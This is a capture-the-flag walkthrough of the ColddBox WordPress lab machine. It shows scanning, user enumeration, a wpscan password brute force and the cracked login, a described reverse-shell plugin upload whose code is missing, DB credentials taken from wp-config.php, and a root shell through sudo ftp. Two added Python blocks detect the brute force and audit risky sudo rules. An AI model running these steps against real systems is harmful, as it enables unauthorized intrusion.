Colddbox - Easy
As the machine description says, this is a WordPress machine of easy difficulty. The machine can be found on vulnhub. It's an interesting room, and I enjoyed the privilege escalation part most.
Enumeration:
1) First I need to discover the machine's IP. I used netdiscover and found the IP 10.0.2.44:
netdiscover -i eth0 -r 10.0.0.0/16
2) Next, scan all ports with nmap: nmap -p- -v -T5 -Pn 10.0.2.44
PORT STATE SERVICE
80/tcp open http
4512/tcp open unknown
3) Now scan the services running on those ports: nmap -sV -A -p 80,4512 -v 10.0.2.44
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_ 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
4) For further enumeration I used another tool, enum4linux. Nothing was found, which is expected since no SMB ports are open.
enum4linux -v 10.0.2.44

5) As the site is running WordPress, I scanned it with wpscan. This scan gives valuable info:
wpscan -e -v --url http://10.0.2.44/
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://10.0.2.44/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://10.0.2.44/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://10.0.2.44/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
[i] No plugins Found.
[i] No DB Exports Found.
[i] User(s) Identified:
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
6) I need more info before starting any attack, so I enumerated the web server further. I brute-forced directories with gobuster:
gobuster dir -u http://10.0.2.44/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
/wp-content (Status: 301) [Size: 311] [--> http://10.0.2.44/wp-content/]
/wp-includes (Status: 301) [Size: 312] [--> http://10.0.2.44/wp-includes/]
/wp-admin (Status: 301) [Size: 309] [--> http://10.0.2.44/wp-admin/]
/hidden (Status: 301) [Size: 307] [--> http://10.0.2.44/hidden/]
/server-status (Status: 403) [Size: 274]
Exploitation:
7) I found some interesting directories and usernames, so first I tried brute-forcing the /wp-admin login page with wpscan:
wpscan --url http://10.0.2.44 -e u -t 50 -P /usr/share/wordlists/rockyou.txt
This attack gave me a username, c0ldd, and a password, 9876543210.
Now I can log in with them.
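From the defender's side, the two wpscan phases above (author-ID enumeration in step 5 and the wp-login.php password brute force in step 7) leave a very recognisable trail in the Apache access log. This is an added example, not part of the write-up: it parses combined-format log lines and flags source IPs that probe many ?author=N URLs or send many failed login POSTs. The log lines and the 10.0.2.15 / 10.0.2.99 client addresses are constructed, and the thresholds are assumptions.

```python
"""Detect WordPress author enumeration and wp-login.php brute forcing in
Apache combined-format access logs (added example; sample lines are constructed)."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
AUTHOR_RE = re.compile(r'^/\?author=\d+$')  # the pattern wpscan's author-ID brute force uses

def analyse(lines, login_threshold=20, author_threshold=3):
    """Return {ip: [findings]} for clients that look like wpscan enumeration or
    brute forcing. Thresholds are assumptions; tune them to the site's normal traffic."""
    logins = defaultdict(int)
    authors = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparseable lines instead of crashing on them
        ip, method, path, status = m['ip'], m['method'], m['path'], m['status']
        if method == 'POST' and path.startswith('/wp-login.php') and status == '200':
            # WordPress answers a failed login with 200 (the form again) and a
            # successful one with a 302 to /wp-admin/, so 200s count as failures
            logins[ip] += 1
        elif AUTHOR_RE.match(path):
            authors[ip].add(path)
    findings = defaultdict(list)
    for ip, n in logins.items():
        if n >= login_threshold:
            findings[ip].append(f'{n} failed wp-login.php POSTs')
    for ip, paths in authors.items():
        if len(paths) >= author_threshold:
            findings[ip].append(f'{len(paths)} distinct ?author=N probes')
    return dict(findings)

# Constructed sample: one client enumerating authors then spraying passwords,
# and one legitimate client logging in successfully on the first try.
SAMPLE = (
    [f'10.0.2.15 - - [01/Jan/2024:10:00:{i:02d} +0000] "GET /?author={i} HTTP/1.1" 301 0'
     for i in range(1, 6)]
    + [f'10.0.2.15 - - [01/Jan/2024:10:01:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4096'
       for i in range(25)]
    + ['10.0.2.99 - - [01/Jan/2024:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
       '10.0.2.99 - - [01/Jan/2024:10:02:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 12345']
)

if __name__ == '__main__':
    for ip, notes in analyse(SAMPLE).items():
        print(ip, '->', '; '.join(notes))
```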

8) There are 4 ways to get a reverse shell from a WordPress site:
Upload a shell through the Theme
Upload a shell through the Plugin
Edit the theme's 404.php template
Use a pre-installed plugin's header.php
After some googling, I found 2 well-written articles about getting a reverse shell. Reading them won't waste your time.
I modified the code below (set it to connect back to my VM IP) and uploaded it as a zip. This code works as a plugin.

9) On my attack box I started a listener and then simply 'Activated' the plugin from the WordPress dashboard. That gave me user access.

Privilege escalation:
(Failed attempts) I tried the approaches below and they failed, so I noted them.
I was able to create a folder in /tmp, so I downloaded linpeas there, but it failed to execute. The SUID-finding command works: find / -perm -u=s -type f 2>/dev/null, but it turned up nothing useful. Python3 is available on the box.
10) After many failed attempts I tried the command below. The database configuration leaked credentials: cat wp-config.php | grep DB
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
11) The DB password could be reused, so I started trying it, but there was neither an interactive terminal nor the ability to run sudo. So I spawned a terminal using python3. I have marked the steps in the picture below.

12) Further enumeration shows 3 commands that can be run as root via sudo: sudo -l
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
13) Running vim could also give me root access, but I tried ftp: I ran ftp and then /bin/bash from inside it.
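The root path in steps 12 and 13 comes down to a sudoers rule that lets c0ldd run interactive binaries as root with no argument restriction. The following is an added audit example, not from the write-up: it parses "sudo -l" output and flags rules of that kind so they can be tightened (sudoedit instead of vim, explicit arguments for chmod, removal of ftp). The sample output and the hostname placeholder are constructed, and the RISKY table is an assumption built from the three binaries the write-up found.

```python
"""Audit 'sudo -l' output for rules that effectively grant an unrestricted root
shell (added example; the sample output below is constructed)."""
import re

# (runas) [TAG: ...] /path/to/cmd [args]
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$')

# Binaries that should never be granted as root without argument limits; the
# remediation text is the point of the audit (assumed set, based on the write-up).
RISKY = {
    'vim': 'editor with a command mode; grant sudoedit on specific files instead',
    'ftp': 'interactive client that can drop to a shell; remove the rule',
    'chmod': 'can change the mode of any file as root; restrict the allowed arguments',
}

def audit(sudo_l_output):
    """Return [(command, reason)] for every root-capable rule that is risky."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # headers such as 'User X may run ...' are not rules
        runas, cmd, args = m['runas'], m['cmd'], m['args'].strip()
        if 'root' not in runas and 'ALL' not in runas:
            continue  # rule cannot reach root, so it is out of scope here
        name = cmd.rsplit('/', 1)[-1]
        if cmd == 'ALL':
            findings.append((cmd, 'unrestricted ALL as root'))
        elif name in RISKY and not args:
            findings.append((cmd, RISKY[name]))
        elif '*' in args:
            findings.append((cmd, 'wildcard arguments; pin them to exact values'))
    return findings

# Constructed sample mirroring the three rules found in the write-up.
SAMPLE = """Matching Defaults entries for c0ldd on <host>:
    env_reset, mail_badpass

User c0ldd may run the following commands on <host>:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
"""

if __name__ == '__main__':
    for cmd, reason in audit(SAMPLE):
        print(f'{cmd}: {reason}')
```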

Thanks for reading. I hope this amazing CTF and write-up help you a lot.